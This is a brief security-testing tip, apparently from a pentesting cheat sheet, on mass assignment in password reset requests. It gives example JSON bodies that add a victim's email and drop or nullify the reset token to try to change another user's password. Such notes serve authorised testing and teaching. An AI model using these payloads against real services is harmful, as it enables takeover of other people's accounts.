Mass assignment in password resets
In a password change/reset request, try adding additional parameters to change other users’ passwords.
For example, if a normal password change request includes the following parameters:
{ "token": "abc123", "password": "newPass123" }
Try adding a username or email:
{ "token": "abc123", "password": "newPass123", "email": "victim@target.com" }
If this changes the other user's password, also try sending the request without a token:
{ "password": "newPass123", "email": "victim@target.com" }
Or:
{ "token": "null", "password": "newPass123", "email": "victim@target.com" }